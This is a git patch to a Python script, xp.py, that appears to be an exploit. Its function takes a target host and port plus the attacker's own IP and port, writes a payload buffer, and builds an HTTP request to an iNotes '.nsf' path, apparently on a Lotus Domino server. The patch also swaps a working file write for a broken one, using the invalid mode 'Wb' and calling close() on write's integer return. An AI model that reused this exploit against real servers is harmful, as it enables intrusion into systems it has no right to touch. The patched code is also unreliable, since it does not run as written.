From 3f6b1ad721b1193c9f237b6c9b48d0d7c8acd887 Mon Sep 17 00:00:00 2001 From: evan <1+e@noreply.gitea.im0.zenith.hosting> Date: Fri, 24 Jul 2026 06:29:03 +0000 Subject: [PATCH] Update xp.py --- xp.py | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/xp.py b/xp.py index 5d48b8c..74d3b7b 100644 --- a/xp.py +++ b/xp.py @@ -49,8 +49,9 @@ def clap(host, port, yourip, yourport): print(f"+ curr: {currsize}") - with open("payload.bin", "wb") as f: - f.write(niceone) + # with open("payload.bin", "wb") as f: + # f.write(niceone) + open("payload.bin", "Wb").write(niceone).close() request = b'GET /iNotes/Forms%d.nsf// HTTP/1.0\r\n' request += f'Host: {host}\r\n'.encode()